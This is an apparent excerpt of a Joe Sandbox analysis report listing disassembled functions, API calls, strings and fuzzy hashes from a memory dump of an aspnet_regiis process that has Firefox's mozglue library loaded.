                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 418114769-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7F1800
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                      • Part of subcall function 6C794290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C7D3EBD,6C7D3EBD,00000000), ref: 6C7942A9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                                                                                                    • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                                                                                                    • API String ID: 46770647-1733325692
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD4F2
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD50B
                                                                                                                                                                      • Part of subcall function 6C79CFE0: EnterCriticalSection.KERNEL32(6C81E784), ref: 6C79CFF6
                                                                                                                                                                      • Part of subcall function 6C79CFE0: LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C79D026
                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD52E
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E7DC), ref: 6C7BD690
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD751
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                    • String ID: MOZ_CRASH()
                                                                                                                                                                    • API String ID: 3805649505-2608361144
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __aulldiv
                                                                                                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                                                                                                    • API String ID: 3732870572-2661126502
                                                                                                                                                                    APIs
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C7E4721
                                                                                                                                                                      • Part of subcall function 6C794410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C7D3EBD,00000017,?,00000000,?,6C7D3EBD,?,?,6C7942D2), ref: 6C794444
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                                                                                                    • API String ID: 680628322-2661126502
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C794290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C7D3EBD,6C7D3EBD,00000000), ref: 6C7942A9
                                                                                                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C7EB127), ref: 6C7EB463
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7EB4C9
                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C7EB4E4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                    • String ID: pid:
                                                                                                                                                                    • API String ID: 1720406129-3403741246
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DE577
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DE584
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DE5DE
                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C7DE8A6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                                    • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                                    • API String ID: 1483687287-53385798
                                                                                                                                                                    APIs
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C7E0CD5
                                                                                                                                                                      • Part of subcall function 6C7CF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C7CF9A7
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C7E0D40
                                                                                                                                                                    • free.MOZGLUE ref: 6C7E0DCB
                                                                                                                                                                      • Part of subcall function 6C7B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C7B5EDB
                                                                                                                                                                      • Part of subcall function 6C7B5E90: memset.VCRUNTIME140(6C7F7765,000000E5,55CCCCCC), ref: 6C7B5F27
                                                                                                                                                                      • Part of subcall function 6C7B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C7B5FB2
                                                                                                                                                                    • free.MOZGLUE ref: 6C7E0DDD
                                                                                                                                                                    • free.MOZGLUE ref: 6C7E0DF2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4069420150-0
                                                                                                                                                                    • Opcode ID: 21fcdf366bc2b6ebfc95b11c9ff5bff236859424bc7c5b8dbf826a3d68b42a14
                                                                                                                                                                    • Instruction ID: f5a1b5834b4901808d1c18c4f792e04793c58c8d0d35a9fb601ba65c93ad2b41
                                                                                                                                                                    • Opcode Fuzzy Hash: 21fcdf366bc2b6ebfc95b11c9ff5bff236859424bc7c5b8dbf826a3d68b42a14
                                                                                                                                                                    • Instruction Fuzzy Hash: 61414C71A087808BD320CF29C68179EFBE5BFC9754F518A2EE8D887711DB70A445CB82
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C7DDA31,00100000,?,?,00000000,?), ref: 6C7ECDA4
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                      • Part of subcall function 6C7ED130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C7ECDBA,00100000,?,00000000,?,6C7DDA31,00100000,?,?,00000000,?), ref: 6C7ED158
                                                                                                                                                                      • Part of subcall function 6C7ED130: InitializeConditionVariable.KERNEL32(00000098,?,6C7ECDBA,00100000,?,00000000,?,6C7DDA31,00100000,?,?,00000000,?), ref: 6C7ED177
                                                                                                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C7DDA31,00100000,?,?,00000000,?), ref: 6C7ECDC4
                                                                                                                                                                      • Part of subcall function 6C7E7480: ReleaseSRWLockExclusive.KERNEL32(?,6C7F15FC,?,?,?,?,6C7F15FC,?), ref: 6C7E74EB
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C7DDA31,00100000,?,?,00000000,?), ref: 6C7ECECC
                                                                                                                                                                      • Part of subcall function 6C7ACA10: mozalloc_abort.MOZGLUE(?), ref: 6C7ACAA2
                                                                                                                                                                      • Part of subcall function 6C7DCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C7ECEEA,?,?,?,?,00000000,?,6C7DDA31,00100000,?,?,00000000), ref: 6C7DCB57
                                                                                                                                                                      • Part of subcall function 6C7DCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C7DCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C7ECEEA,?,?), ref: 6C7DCBAF
                                                                                                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C7DDA31,00100000,?,?,00000000,?), ref: 6C7ED058
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 861561044-0
                                                                                                                                                                    • Opcode ID: 878f331c94cc6cfe26f6a7dae195a0eb2bc7263b7cf565deaa79994b3acec886
                                                                                                                                                                    • Instruction ID: ab89e100123472adada6793740c5994819ecb81997eb182e78fd5a7ebb2ee305
                                                                                                                                                                    • Opcode Fuzzy Hash: 878f331c94cc6cfe26f6a7dae195a0eb2bc7263b7cf565deaa79994b3acec886
                                                                                                                                                                    • Instruction Fuzzy Hash: FBD17176A04B069FD708CF28C580B99F7E1BF99308F05862DD8598B752EB31E955CBC1
                                                                                                                                                                    APIs
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C7A17B2
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C7A18EE
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7A1911
                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7A194C
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3725304770-0
                                                                                                                                                                    • Opcode ID: 52fddec07e8782d8b0c86baff3d6f4784655e7482d74b59000cd93ce6447e08a
                                                                                                                                                                    • Instruction ID: 9b0210907a4ae44b179f9a5b54262a6f2619754cf4cc5761ae33e960d077b495
                                                                                                                                                                    • Opcode Fuzzy Hash: 52fddec07e8782d8b0c86baff3d6f4784655e7482d74b59000cd93ce6447e08a
                                                                                                                                                                    • Instruction Fuzzy Hash: 5B81C470A11305DFEB08CFA8D9949AEBBB1FF89314F04462CE815AB755D730E845CBA2
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6C7B5D40
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F688), ref: 6C7B5D67
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C7B5DB4
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F688), ref: 6C7B5DED
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 557828605-0
                                                                                                                                                                    • Opcode ID: d36a448bffb01140e8ca68bea5a8a6b9e9d423f0201b2a1411a8a401a2c6fba7
                                                                                                                                                                    • Instruction ID: 1d64ec5c442db8ccfb94e7a17715be4793389f8c1a8222934fe2ab0414f457a8
                                                                                                                                                                    • Opcode Fuzzy Hash: d36a448bffb01140e8ca68bea5a8a6b9e9d423f0201b2a1411a8a401a2c6fba7
                                                                                                                                                                    • Instruction Fuzzy Hash: 92516C71E0021A8FCF18CF68C996AAEBBB1BB95308F194629D815B7B51C7706D45CBD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C79CEBD
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C79CEF5
                                                                                                                                                                    • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C79CF4E
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                    • String ID: 0
                                                                                                                                                                    • API String ID: 438689982-4108050209
                                                                                                                                                                    • Opcode ID: 51ad183619de2bf521569a3f5e0149bde4841601fcb6327daa62fcfe90911a31
                                                                                                                                                                    • Instruction ID: 9c05de48745d7a43cc84d82055589a09fc164d8ffaaa2857fe575a50be5c1156
                                                                                                                                                                    • Opcode Fuzzy Hash: 51ad183619de2bf521569a3f5e0149bde4841601fcb6327daa62fcfe90911a31
                                                                                                                                                                    • Instruction Fuzzy Hash: EF511276A002568FCB00CF18D890AAABBB5FF99304F19859DD85A5F752D731ED06CBE0
                                                                                                                                                                    APIs
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7F77FA
                                                                                                                                                                    • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C7F7829
                                                                                                                                                                      • Part of subcall function 6C7CCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C7931A7), ref: 6C7CCC45
                                                                                                                                                                      • Part of subcall function 6C7CCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C7931A7), ref: 6C7CCC4E
                                                                                                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C7F789F
                                                                                                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C7F78CF
                                                                                                                                                                      • Part of subcall function 6C794DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C794E5A
                                                                                                                                                                      • Part of subcall function 6C794DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C794E97
                                                                                                                                                                      • Part of subcall function 6C794290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C7D3EBD,6C7D3EBD,00000000), ref: 6C7942A9
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2525797420-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C7D82BC,?,?), ref: 6C7D649B
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D64A9
                                                                                                                                                                      • Part of subcall function 6C7CFA80: GetCurrentThreadId.KERNEL32 ref: 6C7CFA8D
                                                                                                                                                                      • Part of subcall function 6C7CFA80: AcquireSRWLockExclusive.KERNEL32(6C81F448), ref: 6C7CFA99
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D653F
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7D655A
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3596744550-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C7ED019,?,?,?,?,?,00000000,?,6C7DDA31,00100000,?), ref: 6C7CFFD3
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,6C7ED019,?,?,?,?,?,00000000,?,6C7DDA31,00100000,?,?), ref: 6C7CFFF5
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,6C7ED019,?,?,?,?,?,00000000,?,6C7DDA31,00100000,?), ref: 6C7D001B
                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C7ED019,?,?,?,?,?,00000000,?,6C7DDA31,00100000,?,?), ref: 6C7D002A
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 826125452-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7AB4F5
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7AB502
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7AB542
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7AB578
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2047719359-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C79F20E,?), ref: 6C7D3DF5
                                                                                                                                                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C79F20E,00000000,?), ref: 6C7D3DFC
                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7D3E06
                                                                                                                                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C7D3E0E
                                                                                                                                                                      • Part of subcall function 6C7CCC00: GetCurrentProcess.KERNEL32(?,?,6C7931A7), ref: 6C7CCC0D
                                                                                                                                                                      • Part of subcall function 6C7CCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C7931A7), ref: 6C7CCC16
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2787204188-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7E205B
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C7E201B,?,?,?,?,?,?,?,6C7E1F8F,?,?), ref: 6C7E2064
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7E208E
                                                                                                                                                                    • free.MOZGLUE(?,?,?,00000000,?,6C7E201B,?,?,?,?,?,?,?,6C7E1F8F,?,?), ref: 6C7E20A3
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2047719359-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C7E85D3
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C7E8725
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                    • String ID: map/set<T> too long
                                                                                                                                                                    • API String ID: 3720097785-1285458680
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C79BDEB
                                                                                                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C79BE8F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                    • String ID: 0
                                                                                                                                                                    APIs
                                                                                                                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7D3D19
                                                                                                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C7D3D6C
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _errnomozalloc_abort
                                                                                                                                                                    • String ID: d
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C7A44B2,6C81E21C,6C81F7F8), ref: 6C7A473E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C7A474A
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: GetNtLoaderAPI
                                                                                                                                                                    APIs
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C7F6E22
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7F6E3F
                                                                                                                                                                    Strings
                                                                                                                                                                    • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C7F6E1D
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Init_thread_footergetenv
                                                                                                                                                                    • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                    APIs
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A9EEF
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                    • String ID: Infinity$NaN
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0K}l,?,6C7D4B30,80000000,?,6C7D4AB7,?,6C7943CF,?,6C7942D2), ref: 6C7A6C42
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0K}l,?,6C7D4B30,80000000,?,6C7D4AB7,?,6C7943CF,?,6C7942D2), ref: 6C7A6C58
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: moz_xmalloc$malloc
                                                                                                                                                                    • String ID: 0K}l
                                                                                                                                                                    APIs
                                                                                                                                                                    • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C7ABEE3
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C7ABEF5
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$CallsDisableLoadThread
                                                                                                                                                                    • String ID: cryptbase.dll
                                                                                                                                                                    • API String ID: 4137859361-1262567842
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C7EB2C9,?,?,?,6C7EB127,?,?,?,?,?,?,?,?,?,6C7EAE52), ref: 6C7EB628
                                                                                                                                                                      • Part of subcall function 6C7E90E0: free.MOZGLUE(?,00000000,?,?,6C7EDEDB), ref: 6C7E90FF
                                                                                                                                                                      • Part of subcall function 6C7E90E0: free.MOZGLUE(?,00000000,?,?,6C7EDEDB), ref: 6C7E9108
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C7EB2C9,?,?,?,6C7EB127,?,?,?,?,?,?,?,?,?,6C7EAE52), ref: 6C7EB67D
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C7EB2C9,?,?,?,6C7EB127,?,?,?,?,?,?,?,?,?,6C7EAE52), ref: 6C7EB708
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C7EB127,?,?,?,?,?,?,?,?), ref: 6C7EB74D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C7DFF2A), ref: 6C7EDFFD
                                                                                                                                                                      • Part of subcall function 6C7E90E0: free.MOZGLUE(?,00000000,?,?,6C7EDEDB), ref: 6C7E90FF
                                                                                                                                                                      • Part of subcall function 6C7E90E0: free.MOZGLUE(?,00000000,?,?,6C7EDEDB), ref: 6C7E9108
